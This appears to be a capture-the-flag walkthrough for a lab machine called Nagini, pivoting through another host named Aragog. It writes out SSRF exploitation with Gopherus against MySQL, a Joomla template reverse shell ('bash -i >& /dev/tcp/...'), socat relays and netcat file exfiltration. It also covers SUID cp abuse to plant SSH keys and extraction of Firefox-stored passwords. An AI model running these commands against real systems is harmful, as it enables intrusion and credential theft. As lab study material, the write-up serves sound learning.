[[10.10.0.128 (Aragog Vmnet 2)]]
1. Enumerate this machine via nmap with the help from chisel and proxychains
```
sudo proxychains -sT -Pn -n -v -open --top-ports 500 10.10.0.128 -oG targeted
```
2. Knowing that the machine has a webpage you can run the following command
```
gobuster dir -u http://10.10.0.128 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x html,php,txt --proxy socks5://127.0.0.1:1080
```
3. You'll find the note.txt file
4. Go to that file and you'll see that they're using HTTP3 for an specific domain, use a tool to fetch that page via chisel. This can be done by portforwarding the UDP 443 port of this machine via the Aragog
```
chisel client 192.168.1.11:1234 (chisel server) R:socks (proxy) R:443:10.10.0.129:443/udp (HTTP3 service port)
```
5. You'll find a message telling that there's an obsolete functionality in the endpoint "/internalResourceFeTcher.php"
6. With this functionality you can obtain files or information hosted in a URL. We can try this by fetching the webpage hosted in the Aragog machine (10.10.0.128)
7. Once we know that there's a SSRF vulnerability, we can try to exploit it by using a tool called socat. This tool will enable us to redirect all traffic that comes to a port to another host. In our case we will forward all traffic that arrives to http://10.10.0.128:4343 to our machine http://192.168.1.11 who is hosting an evil server.
```bash
python -m http.server 80 (in socat directory)

wget http://192.168.1.11/socat (in Aragog machine)

chmod u+x ./socat

python -m http.server 80 (in a folder with exploits)

./socat TCP-LISTEN:4343,fork TCP:192.168.1.11:80
```
8. Now, if we try to retrieve the webpage http://10.10.0.128:4343 we will get all the files from our kali machine.
9. This road is a dead end.
10. Going through another path we can try to exploit the joomla. This can be done with the joomscan tool. This tool will give us some interesting files and directories such as "configuration.php.bak", this file has the credentials to the mysql database.
11. After obtaining this information, we can use another tool called Gopherus. This tool creates gopher:// strings that enables us to interact with the MySQL service through the SSRF.
```SQL
python2 gopherus.py --exploit mysql

goblin

SHOW databases;

USE joomla; show tables;

USE joomla; SELECT * FROM joomla_users;

echo -n "password123" | md5sum
USE joomla; UPDATE joomla_users SET password="md5-STR" WHERE username='site_admin'
```
12. Once you've the site_admin and his password you can access to the joomla administrative dashboard in the endpoint "/joomla/administrator".
13. Inside this panel you can go to "Extensions -> Templates -> Templates" and edit an existing template like "Protostar Details and Files"
14. Now, you've to go to error.php and add a reverse shell command like the following:
```php
system("bash -c 'bash -i >& /dev/tcp/10.10.0.128/1111 0>&1'");
```
15. Note that this reverse shell is pointing at the Vmnet 2 adapter of the Aragog machine. This is because, with the help of socat, we've to redirect the traffic going to the port 1111 of the Aragog machine back to our kali machine in the port 443. This can be done with the following commands:
```
./socat TCP-LISTEN:1111,fork TCP:192.168.1.11:443
```
And start the server in that port of our machine
```
nc -lvnp 443
```
16. Once this is all done, cause an error in the webpage in order to execute the error.php page.
17. Now that you've access to the machine it's time to escalate privileges.
Horcrux 1 /var/www/html: horcrux_{MzogU2x5dGhFcmlOJ3MgTG9jS0VldCBkRXN0cm9ZZUQgYlkgUm9O}
18. By enumerating thins in the snape home directory you can find a file called ".creds.txt". This file has the snape's user password base64 encoded.
19. Now, being in the snape user, enumerate
```
find / -perm /4000 2>/dev/null
```
By running this command you'll find the file "/home/hermoine/bin/su_cp"
20. Because this file is a copy of the cp binary but with the SUID permission you can copy files as the "hermoine" user. This can be exploited by copying authorized keys from our attacker machine to the .ssh folder of this user.
```
cat ~/.ssh/id_ed25519.pub | tr -d "\n" | xclip -sel clip (In attacker's machine)

nano /tmp/authorized_keys (copy the ssh id_rsa.pub to that file)

/home/hermoine/bin/su_cp /tmp/authorized_keys /home/hermoine/.ssh/authorized_keys
```
21. Once you've copied the file into the .ssh directory, then you can log in via ssh through proxychains
Horcrux 2 /home/hermoine/: horcrux_{NDogSGVsZ2EgSHVmZmxlcHVmZidzIEN1cCBkZXN0cm95ZWQgYnkgSGVnaginiybWlvbmU=}
22. Now, while enumerating the home directory of hermoine you'll find the directory ".mozilla". This directory in particular can be a point of failure because, if the user has a profile, you can crack the passwords in storage with a tool like firepwd.
23. The way to pass files from Nagini to our attacker's machine is as follows:
```
nc -lvnp 443 > file (kali machine)

./socat TCP-LISTEN:1111,fork TCP:192.168.1.11:443 (Aragog machine (10.10.0.128 and 192.168.1.12))

cat file > /dev/tcp/10.10.0.128/1111 (Nagini machine (10.10.0.129))
```
What we're doing here is initiate a netcat server in the 443 port and tell it to send all the data that it receives to the file specified. After that, we start a socat process that redirects all the information received through the port 1111 to our kali machine in the port 443. After all of that was done we send the file to the Aragog machine by running the last command.
24. Doing the process described above two times for "key4.db" and "logins.json" we have all the files needed to run the "firepwd.py" script.
```
.venv/bin/python3 firepwd.py
```
25. After running this script we will get the root password in plain text.
```
http://nagini.hogwarts:b'root',b'@Alohomora#123'
```
Horcrux 3 /root: horcrux_{NTogRGlhZGVtIG9mIFJhdmVuY2xhdyBkZXN0cm95ZWQgYnkgSGFycnk=}